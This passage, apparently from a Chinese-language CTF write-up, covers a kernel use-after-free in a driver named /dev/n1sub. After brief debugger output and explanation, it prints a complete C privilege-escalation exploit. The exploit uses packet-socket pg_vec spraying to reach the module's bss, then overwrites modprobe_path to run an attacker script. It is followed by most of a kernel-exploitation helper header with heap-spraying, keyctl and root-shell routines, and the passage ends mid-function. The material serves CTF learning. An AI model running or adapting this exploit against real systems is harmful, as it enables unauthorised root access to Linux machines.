7
pwndbg> telescope 0xffff888004cc3000
00:0000│ 0xffff888004cc3000 ◂— 0x0
01:0008│ 0xffff888004cc3008 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
02:0010│ 0xffff888004cc3010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:0018│ 0xffff888004cc3018 ◂— 0x627573 /* 'sub' */
04:0020│ 0xffff888004cc3020 ◂— 0x0
... ↓ 3 skipped
  • 此时我们可以发现 0xffff888004cc3000 和 0xffffffffc0002000 都映射了内核模块的 bss 段

对于 0xffffffffc0002000 我们是控制不了的,但程序不知道是什么原因也在 0xffff888004cc3000 映射了一遍 bss 段,这就导致了我们可以直接控制 bss 段上的地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
uint64_t *unexpected_page;
int index;
while (1)
{
for (uint64_t i = 0; i < PAGE_SIZE; i++)
edit(0);

char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
if ((uint64_t)page == -1)
continue;

print_hex(page, 0x100);
unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
if (unexpected_page[0x3] == 0x0000000000627573){
puts("find target");
break;
}

munmap(page, PAGE_SIZE * block_nr);
if (index++ > 0x200){
err_exit("UAF error");
}
}

控制 bss 段上的地址,配合内核模块实现的功能就可以任意写(只能减少)

接下来最简单的提权方法就是修改 modprobe_path(将 /sbin/modprobe 修改为 /tmp//modprobe)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

#include "kernelpwn.h"
#define PAGE_SIZE 0x1000

int fd;
/* Single-field wrapper around a size_t; not referenced by any code visible in this file. */
struct argg {
size_t data;
};

uint32_t sub_size, sub_offset;

/*
 * Issue request 0xDEADBEE0 on the device, passing the address of the global
 * sub_offset as the argument. The raw ioctl result is handed back unchanged;
 * main() stores it in sub_size.
 */
int add(){
    int rc = ioctl(fd, 0xDEADBEE0, &sub_offset);

    return rc;
}

/*
 * Issue request 0xDEADBEE1 on the device with `index` as the argument
 * and return the raw ioctl result.
 */
int dele(int index){
    int rc = ioctl(fd, 0xDEADBEE1, index);

    return rc;
}

/*
 * Issue request 0xDEADBEE2 on the device with `index` as the argument
 * and return the raw ioctl result.
 */
int edit(int index){
    int rc = ioctl(fd, 0xDEADBEE2, index);

    return rc;
}

/*
 * Exploit entry point.
 *
 *  1. Open /dev/n1sub and pre-allocate 0x80 one-page packet rings.
 *  2. add() an object, record its size and offset, then free it with dele(0).
 *  3. Create a TPACKET_V3 ring whose pg_vec array (8 bytes per block) has the
 *     same size as the freed object.
 *  4. Repeatedly call edit(0) and mmap the ring until the page found at block
 *     index sub_offset / 8 carries the "sub" marker in its fourth qword.
 *  5. Derive kernel_base and modprobe_path from a pointer in that page, then
 *     patch modprobe_path byte by byte and trigger it with a dummy binary.
 */
int main(int argc, char** argv, char** envp){
    save_status();
    bind_core(0);
    unshare_setup();
    fd = open("/dev/n1sub", O_RDWR);
    if (fd < 0)
        err_exit("open /dev/n1sub");

    int socket_list[0x100];
    for (int i = 0; i < 0x80; i++)
        socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

    /* add() returns the object size; a negative value means the ioctl failed. */
    int add_ret = add();
    if (add_ret < 0)
        err_exit("ioctl add");
    sub_size = add_ret;
    printf("sub_size: 0x%x\n",sub_size);
    printf("sub_offset: 0x%x\n",sub_offset);
    /* One 8-byte pg_vec entry per block, so the array is sub_size bytes long. */
    int block_nr = sub_size / 0x8;
    dele(0);

    int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

    uint64_t *unexpected_page;
    /* Must start at zero: it bounds the retry loop below. */
    int attempts = 0;
    while (1)
    {
        /*
         * PAGE_SIZE edits per round.
         * NOTE(review): per the write-up each edit decrements the qword at
         * sub_offset, so one round moves it back by one page - confirm.
         */
        for (uint64_t i = 0; i < PAGE_SIZE; i++)
            edit(0);

        char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
        if (page == MAP_FAILED) {
            /* Count failed mappings too, so the loop cannot spin forever. */
            if (attempts++ > 0x200)
                err_exit("UAF error");
            continue;
        }

        print_hex(page, 0x100);
        /* The modified pg_vec entry is block number sub_offset / 8 of the mapping. */
        unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
        /* 0x627573 is the string "sub" seen at offset 0x18 of the module page. */
        if (unexpected_page[0x3] == 0x0000000000627573){
            puts("find target");
            break;
        }

        munmap(page, PAGE_SIZE * block_nr);
        if (attempts++ > 0x200){
            err_exit("UAF error");
        }
    }

    uint64_t kernel_base = unexpected_page[0xF] - 0x1851720;
    uint64_t modprobe_path = kernel_base + 0x1852420;

    printf("kernel_base: 0x%lx\n", kernel_base);
    printf("modprobe_path: 0x%lx\n", modprobe_path);

    /*
     * Number of edits applied at byte offsets 1..4 of modprobe_path; entry 0
     * is unused. The loop is bounded by the array length: the table has five
     * entries, so index 5 does not exist.
     */
    uint32_t difference[] = {0, 0xFF, 0xF4, 0xF8, 0x3E};
    for (size_t i = 1; i < sizeof difference / sizeof difference[0]; i++){
        /* Slot 0x6E (byte offset 0x370) of the module page is rewritten so the
         * next edits land on modprobe_path + i. */
        unexpected_page[0x6E] = modprobe_path - sub_offset + i;

        for (uint32_t j = 0; j < difference[i]; j++)
            edit(0);
    }

    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("echo '#!/bin/sh\nchmod 777 /flag' > /tmp/modprobe");
    system("chmod +x /tmp/modprobe");
    system("chmod +x /tmp/dummy");

    system("/tmp/dummy");
    return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

/*
 * Translate a direct-map address into the address of its descriptor in the
 * vmemmap array: round down to a 4 KiB boundary, take the page index relative
 * to page_offset_base, and step 0x40 bytes per page from vmemmap_base.
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_start = direct_map_addr & ~(size_t)0xfff;
    size_t page_index = (page_start - page_offset_base) >> 12;

    return vmemmap_base + (page_index << 6);
}

/*
 * Dump `size` bytes starting at `p`, one pointer-sized row per line: the row
 * offset, the eight individual bytes, and the same bytes as one unsigned long.
 *
 * Returns 1 without printing anything when `size` is not a multiple of
 * sizeof(void *), 0 otherwise.
 */
int print_hex(void *p, int size){
    const unsigned char *buf = (const unsigned char *)p;
    int i;

    if(size % sizeof(void *))
    {
        return 1;
    }
    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += sizeof(void *)){
        unsigned long word;

        /* Copy the word out instead of dereferencing a cast pointer: the
         * source may be neither aligned for nor typed as unsigned long. */
        memcpy(&word, &buf[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
               i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], word);
    }
    return 0;
}

/*
 * Report a fatal error: print `msg` behind a red "[x] Error at:" banner,
 * pause for five seconds, then terminate with EXIT_FAILURE.
 */
void err_exit(char *msg)
{
    static const char banner_fmt[] = "\033[31m\033[1m[x] Error at: \033[0m%s\n";

    printf(banner_fmt, msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Check whether the process runs as uid 0. If so, announce it, run /bin/sh
 * through system() and exit with EXIT_SUCCESS; otherwise print a failure
 * banner, wait five seconds and exit with EXIT_FAILURE. Never returns.
 */
void get_root_shell(void)
{
    puts("[*] Checking for root...");

    if (getuid() == 0) {
        puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
        puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

        system("/bin/sh");

        /* leave through exit() once the shell is done */
        exit(EXIT_SUCCESS);
    }

    puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * userspace status saver
 *
 * Copies the current cs, ss, rsp and flags register values into the globals
 * below, then prints a confirmation line.
 */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
/*
 * Operands are written destination-first with no % prefixes, i.e. Intel
 * syntax. NOTE(review): presumably built with -masm=intel - confirm.
 */
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/*
 * Restrict the calling process to a single CPU.
 *
 * @param core  index of the CPU to run on
 *
 * Prints a confirmation when the affinity was applied. If sched_setaffinity()
 * fails, the reason is printed instead and the function returns without
 * claiming success; the process then keeps its previous affinity.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        printf("\033[31m\033[1m[x] sched_setaffinity failed: \033[0m%s\n",
               strerror(errno));
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/*
 * ret2usr helper: treat the two integers as function addresses, call the
 * first with NULL and feed its result to the second.
 *
 * @param prepare_kernel_cred  address called as void *(*)(void *)
 * @param commit_creds         address called as int (*)(void *)
 */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
    typedef void *(*prepare_fn)(void *);
    typedef int (*commit_fn)(void *);

    prepare_fn make_cred = (prepare_fn)prepare_kernel_cred;
    commit_fn apply_cred = (commit_fn)commit_creds;
    void *new_cred = make_cred(NULL);

    apply_cred(new_cred);
}

/* Write `text` to `fd` and close it; results are not checked. */
static void a3_write_and_close(int fd, const char *text)
{
    write(fd, text, strlen(text));
    close(fd);
}

/**
 * @brief move the process into new mount, user and network namespaces
 * After unshare(), "deny" is written to /proc/self/setgroups, and uid_map and
 * gid_map each receive a one-entry "0 <id> 1" mapping built from getuid() and
 * getgid(). No call is checked for failure.
 * The calling process is meant to carry out the exploit's basic operations
 * inside the namespace only; it should not be the one that obtains root.
 */
void unshare_setup(void)
{
    char map_line[0x100];
    int proc_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    proc_fd = open("/proc/self/setgroups", O_WRONLY);
    a3_write_and_close(proc_fd, "deny");

    proc_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(map_line, sizeof(map_line), "0 %d 1", getuid());
    a3_write_and_close(proc_fd, map_line);

    proc_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(map_line, sizeof(map_line), "0 %d 1", getgid());
    a3_write_and_close(proc_fd, map_line);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
/*
 * Two 64-bit link fields stored as raw integers rather than pointers.
 * NOTE(review): presumably mirrors the layout of the kernel's struct list_head - confirm.
 */
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* note that we should create two processes:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/*
 * Request record for the page sprayer.
 * each allocation is (size * nr) bytes, aligned to PAGE_SIZE
 */
struct pgv_page_request {
int idx; /* NOTE(review): presumably the slot the request applies to - confirm */
int cmd; /* NOTE(review): presumably one of the CMD_* operation codes - confirm */
unsigned int size;
unsigned int nr;
};

/* operations type: allocate pages, free pages, or exit */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/*
 * Open an AF_PACKET raw socket, select TPACKET_V1 and request a TX ring of
 * `nr` blocks of `size` bytes each, with a frame size of 0x1000.
 *
 * Returns the socket fd on success. On failure a "[x] failed at ..." line is
 * printed and the negative result of the failing call is returned; a socket
 * that was already opened is closed first.
 */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
    struct tpacket_req ring_req;
    int tpacket_ver = TPACKET_V1;
    int sock;
    int rc;

    sock = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (sock < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        return sock;
    }

    rc = setsockopt(sock, SOL_PACKET, PACKET_VERSION,
                    &tpacket_ver, sizeof(tpacket_ver));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        close(sock);
        return rc;
    }

    /* describe the ring: nr blocks of size bytes, split into 0x1000-byte frames */
    memset(&ring_req, 0, sizeof(ring_req));
    ring_req.tp_frame_size = 0x1000;
    ring_req.tp_block_nr = nr;
    ring_req.tp_block_size = size;
    ring_req.tp_frame_nr = (ring_req.tp_block_size * ring_req.tp_block_nr)
                           / ring_req.tp_frame_size;

    rc = setsockopt(sock, SOL_PACKET, PACKET_TX_RING, &ring_req, sizeof(ring_req));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        close(sock);
        return rc;
    }

    return sock;
}

/**
 * @brief create a TPACKET_V3 packet socket with an RX ring, bound to "lo"
 *
 * Any failing step prints the errno text with perror() and terminates the
 * process with exit(1).
 *
 * @param block_size size of one ring block in bytes
 * @param frame_size size of one frame in bytes; it is used as a divisor, so
 *                   it must not be zero
 * @param block_nr number of ring blocks
 * @param sizeof_priv value stored in tp_sizeof_priv
 * @param timeout value stored in tp_retire_blk_tov
 * @return the fd of the bound socket
 */
int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
                        uint32_t block_nr, uint32_t sizeof_priv, int timeout)
{
    struct tpacket_req3 ring;
    struct sockaddr_ll addr;
    int tp_version = TPACKET_V3;
    int fd;

    fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (fd < 0) {
        perror("[-] socket (AF_PACKET)");
        exit(1);
    }

    if (setsockopt(fd, SOL_PACKET, PACKET_VERSION,
                   &tp_version, sizeof(tp_version)) < 0) {
        perror("[-] setsockopt (PACKET_VERSION)");
        exit(1);
    }

    /* ring geometry */
    memset(&ring, 0, sizeof(ring));
    ring.tp_block_size = block_size;
    ring.tp_block_nr = block_nr;
    ring.tp_frame_size = frame_size;
    ring.tp_frame_nr = (block_size * block_nr) / frame_size;
    ring.tp_retire_blk_tov = timeout;
    ring.tp_sizeof_priv = sizeof_priv;
    ring.tp_feature_req_word = 0;

    if (setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &ring, sizeof(ring)) < 0) {
        perror("[-] setsockopt (PACKET_RX_RING)");
        exit(1);
    }

    /* link-layer address: every protocol, on the "lo" interface */
    memset(&addr, 0, sizeof(addr));
    addr.sll_family = PF_PACKET;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_ifindex = if_nametoindex("lo");
    addr.sll_hatype = 0;
    addr.sll_pkttype = 0;
    addr.sll_halen = 0;

    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("[-] bind (AF_PACKET)");
        exit(1);
    }

    return fd;
}

/**
 * @brief ask the spraying child to allocate pages (called by the parent)
 *
 * Sends a CMD_ALLOC_PAGE request through cmd_pipe_req and waits for the
 * child's int reply on cmd_pipe_reply.
 *
 * @param idx slot in the child's socket table that receives the new socket
 * @param size block size forwarded to the child
 * @param nr block count forwarded to the child
 * @return the value replied by the child, or -1 when the request could not
 *         be sent or the reply could not be read completely
 */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
        return -1;
    }

    /* never hand back an uninitialised value when the reply is missing */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        return -1;
    }

    return ret;
}

/**
 * @brief ask the spraying child to free pages (called by the parent)
 *
 * Sends a CMD_FREE_PAGE request through cmd_pipe_req and waits for the
 * child's int reply on cmd_pipe_reply.
 *
 * @param idx slot in the child's socket table whose socket is to be closed
 * @return the value replied by the child, or -1 when the request could not
 *         be sent or the reply could not be read completely
 */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
        return -1;
    }

    /* never hand back an uninitialised value when the reply is missing */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        return -1;
    }

    return ret;
}

/**
 * @brief command loop of the child: serve requests arriving on cmd_pipe_req
 *
 * After entering its own namespaces via unshare_setup() the child reads
 * pgv_page_request records and answers each of them with one int written to
 * cmd_pipe_reply:
 * - CMD_ALLOC_PAGE: result of create_socket_and_alloc_pages(), also stored
 *   in the socket table at `idx`
 * - CMD_FREE_PAGE: result of close() on the socket stored at `idx`
 * - CMD_EXIT: 0, then the loop ends
 * - anything else, or an `idx` outside [0, PGV_PAGE_NUM): -1
 *
 * The loop also ends when the request pipe reports EOF or an error, or when
 * the reply cannot be written.
 */
void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* mark every slot empty so a stray free never closes a random fd */
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        socket_fd[i] = -1;
    }

    /* create an isolated namespace */
    unshare_setup();

    /* handle requests */
    for (;;) {
        if (read(cmd_pipe_req[0], &req, sizeof(req))
            != (ssize_t) sizeof(req)) {
            /* the requester is gone or the pipe is broken */
            break;
        }

        ret = -1;

        switch (req.cmd) {
        case CMD_ALLOC_PAGE:
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid index: %d\n", req.idx);
                break;
            }
            ret = create_socket_and_alloc_pages(req.size, req.nr);
            socket_fd[req.idx] = ret;
            break;
        case CMD_FREE_PAGE:
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid index: %d\n", req.idx);
                break;
            }
            ret = close(socket_fd[req.idx]);
            socket_fd[req.idx] = -1;
            break;
        case CMD_EXIT:
            ret = 0;
            break;
        default:
            printf("[x] invalid request: %d\n", req.cmd);
            break;
        }

        if (write(cmd_pipe_reply[1], &ret, sizeof(ret))
            != (ssize_t) sizeof(ret)) {
            break;
        }

        if (req.cmd == CMD_EXIT) {
            break;
        }
    }
}

/**
 * @brief init the pgv-exploit subsystem
 *
 * Creates the request/reply pipes and forks the child that runs
 * spray_cmd_handler(). The child terminates once the handler returns, so it
 * never continues into the caller's code. Failures of pipe() or fork() are
 * reported with perror() and leave the subsystem unusable.
 */
void prepare_pgv_system(void)
{
    pid_t pid;

    /* pipes for pgv */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0) {
        perror("[x] pipe");
        return;
    }

    /* child process for pages spray */
    pid = fork();
    if (pid < 0) {
        perror("[x] fork");
        return;
    }

    if (pid == 0) {
        spray_cmd_handler();
        /* the child is only an operator: stop here instead of returning */
        exit(0);
    }
}

/**
* IV - keyctl related
*/

/**
 * MUSL does not ship `keyctl.h` either :(
 * Luckily only a handful of macros are needed for exploitation,
 * so they are simply defined here directly :)
 *
 * KEY_SPEC_PROCESS_KEYRING is passed as the keyring argument by key_alloc()
 * and key_unlink(); each KEYCTL_* value is the operation code passed to the
 * keyctl syscall by the wrapper of the matching name.
 */

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

/**
 * @brief add a key of type "user" to the process keyring
 *
 * @param description description string of the key
 * @param payload data stored in the key
 * @param plen length of `payload` in bytes
 * @return result of the add_key syscall, converted to int
 */
int key_alloc(char *description, void *payload, size_t plen)
{
    long rc;

    rc = syscall(__NR_add_key, "user", description, payload, plen,
                 KEY_SPEC_PROCESS_KEYRING);

    return (int) rc;
}

/**
 * @brief issue keyctl(KEYCTL_UPDATE) for a key
 *
 * @param keyid id of the key
 * @param payload new payload
 * @param plen length of `payload` in bytes
 * @return result of the keyctl syscall, converted to int
 */
int key_update(int keyid, void *payload, size_t plen)
{
    long rc;

    rc = syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);

    return (int) rc;
}

/**
 * @brief issue keyctl(KEYCTL_READ) for a key
 *
 * @param keyid id of the key
 * @param buffer destination buffer
 * @param buflen size of `buffer` in bytes
 * @return result of the keyctl syscall, converted to int
 */
int key_read(int keyid, void *buffer, size_t buflen)
{
    long rc;

    rc = syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);

    return (int) rc;
}

/**
 * @brief issue keyctl(KEYCTL_REVOKE) for a key
 *
 * @param keyid id of the key
 * @return result of the keyctl syscall, converted to int
 */
int key_revoke(int keyid)
{
    long rc;

    /* the three trailing arguments are passed as 0 */
    rc = syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);

    return (int) rc;
}

/**
 * @brief issue keyctl(KEYCTL_UNLINK) to detach a key from the process keyring
 *
 * @param keyid id of the key
 * @return result of the keyctl syscall, converted to int
 */
int key_unlink(int keyid)
{
    long rc;

    rc = syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);

    return (int) rc;
}

/**
 * V - sk_buff spraying related
 * note (from the original author): the tail of an sk_buff's data carries a
 * 320-byte skb_shared_info
 *
 * SOCKET_NUM is the number of socket pairs used for spraying and
 * SK_BUFF_NUM the number of writes (or reads) issued on each pair.
 */
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
 * the socket array should be defined like:
 * int sk_sockets[SOCKET_NUM][2];
 */

/**
 * @brief create the socket pairs used to spray sk_buff
 *
 * @param sk_socket array receiving SOCKET_NUM AF_UNIX stream socket pairs
 * @return 0 on success, -1 as soon as one socketpair() call fails
 */
int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
    int pair = 0;

    while (pair < SOCKET_NUM) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[pair]) < 0) {
            printf("[x] failed to create no.%d socket pair!\n", pair);
            return -1;
        }
        pair++;
    }

    return 0;
}

/**
 * @brief write `buf` SK_BUFF_NUM times into the first end of every pair
 *
 * @param sk_socket socket pairs set up by init_socket_array()
 * @param buf data to send
 * @param size number of bytes of `buf` sent per write
 * @return 0 on success, -1 as soon as one write() fails
 */
int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    const int total = SOCKET_NUM * SK_BUFF_NUM;

    /* one flat counter, visiting the writes socket by socket */
    for (int n = 0; n < total; n++) {
        int sock = n / SK_BUFF_NUM;
        int round = n % SK_BUFF_NUM;

        if (write(sk_socket[sock][0], buf, size) < 0) {
            printf("[x] failed to spray %d sk_buff for %d socket!", round, sock);
            return -1;
        }
    }

    return 0;
}

/**
 * @brief read SK_BUFF_NUM times from the second end of every pair
 *
 * @param sk_socket socket pairs set up by init_socket_array()
 * @param buf buffer receiving the data of each read
 * @param size number of bytes requested per read
 * @return 0 on success, -1 as soon as one read() fails
 */
int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    const int total = SOCKET_NUM * SK_BUFF_NUM;

    /* one flat counter, visiting the reads socket by socket */
    for (int n = 0; n < total; n++) {
        int sock = n / SK_BUFF_NUM;

        if (read(sk_socket[sock][1], buf, size) < 0) {
            puts("[x] failed to received sk_buff!");
